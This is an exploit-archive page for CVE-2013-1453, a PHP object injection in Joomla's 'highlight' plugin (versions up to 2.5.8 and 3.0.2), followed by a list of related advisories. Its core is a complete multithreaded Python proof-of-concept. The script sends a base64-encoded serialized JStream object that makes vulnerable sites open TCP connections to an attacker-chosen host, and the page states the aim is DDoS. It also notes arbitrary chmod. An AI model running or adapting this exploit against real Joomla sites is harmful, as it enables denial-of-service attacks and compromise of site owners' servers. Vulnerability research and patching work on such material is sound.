Lucene search
Redeemer1337DAY-ID-20434HistoryFeb 25, 2013 - 12:00 a.m.
Joomla <=2.5.8,<=3.0.2 remote tcp connections opener
2013-02-2500:00:00
redeemer
0day.today
40
EPSS
0.003
Percentile
66.3%
Joomla core plugin βhighlightβ unserializes not trusted input. Plugin
is enabled by default in standard joomla installation.
This proof of concept exploit uses JStream joomla class to make target
opens remote tcp connections to custom address, therefore multiple
vulnerable joomla instances can be used for ddos attacks. (JStream
class can also be used to execute chmod on any file with any mode)
#!/usr/bin/python
#
# Joomla <=2.5.8, <=3.0.2 remote tcp connections opener
#
# Vendor homepage: www.joomla.org ,'
# Versions affected: <=2.5.8, <=3.0.2 ,'
# Created: 2012-12-08 .,. ,'
# Public disclosure: 2013-02-04 .`.`.`. ,' ,'
# CVE: CVE-2013-1453 .`.`.`.`. ,' ,'
# .`.`.`.`.
# Joomla core plugin 'highlight' unserializes .`.`.`.`. ,' ,'
# not trusted input. Plugin is enabled by \\`.`.`. ,'
# default in standard joomla installation. /\.,. ,' ,'
# /
# This proof of concept exploit uses JStream :
# joomla class to make target opens remote tcp :
# connections to custom address, therefore /
# multiple vulnerable joomla instances can be "
# used for ddos attacks.
#
# (JStream class can also be used to execute chmod on any file with any mode)
#
# Author: Marcin "redeemer" Probola
#
import threading
import datetime
import base64
import httplib
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-H","--host",dest="host", help="Host with vulnerable joomla instance", default="localhost")
parser.add_option("-C","--connect",dest="connectHost", help="Make connection to (in format HOST:PORT)", default="localhost:80")
parser.add_option("-T","--threads",dest="threads", help="number of threads", default=1)
(options, args) = parser.parse_args()
# vars
host = options.host
connectHost = options.connectHost
threads = int(options.threads)
# prepare serialized content
serializedTemplate = 'O:7:"JStream":14:{s:11:"\0*\0filemode";i:438;s:10:"\0*\0dirmode";i:493;s:12:"\0*\0chunksize";i:8192;s:11:"\0*\0filename";s:%d:"%s";s:14:"\0*\0writeprefix";s:0:"";s:13:"\0*\0readprefix";s:0:"";s:19:"\0*\0processingmethod";s:1:"f";s:10:"\0*\0filters";a:0:{}s:6:"\0*\0_fh";s:1:"1";s:12:"\0*\0_filesize";N;s:11:"\0*\0_context";N;s:18:"\0*\0_contextOptions";a:0:{}s:12:"\0*\0_openmode";s:1:"w";s:10:"\0*\0_errors";a:0:{}}'
ftpConnectUrl = "ftp://u:[emailΒ protected]" + connectHost + "/s"
serializedBase64 = base64.b64encode( serializedTemplate % ( ftpConnectUrl.__len__(), ftpConnectUrl) )
# thread class - blow (make http request)
class ThreadClass(threading.Thread):
def run(self):
conn = httplib.HTTPConnection(host)
conn.connect()
conn.request("GET", "/?highlight="+serializedBase64)
print host + " connect(" +str(threads)+") to " + connectHost + "\n"
# run threads
for i in range(threads):
t = ThreadClass()
t.start()
# 0day.today [2018-01-09] #Related
securityvulns
securityvulns
exploitdb
exploitdb
Joomla! 3.0.2 - 'highlight.php' PHP Object Injection
2013-02-27 00:00:00
packetstorm
packetstorm
Joomla! 3.0.2 PHP Object Injection
2013-02-27 00:00:00
cvelist
cvelist
CVE-2013-1453
2013-02-13 01:00:00
openvas
openvas
Joomla! 'highlight' Parameter PHP Object Injection Vulnerability
2013-03-03 00:00:00
prion
prion
Sql injection
2013-02-13 01:55:00
nvd
nvd
CVE-2013-1453
2013-02-13 01:55:05
joomla
joomla
[20130201] - Core - Information Disclosure
2012-10-31 00:00:00
exploitpack
exploitpack
Joomla! 3.0.2 - highlight.php PHP Object Injection
2013-02-27 00:00:00
seebug
seebug
Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability
2014-07-01 00:00:00
cve
cve
CVE-2013-1453
2013-02-13 01:55:05
nessus
nessus
Joomla! 2.5.x < 2.5.9 / 3.0.x < 3.0.3 Multiple Vulnerabilities
2013-02-14 00:00:00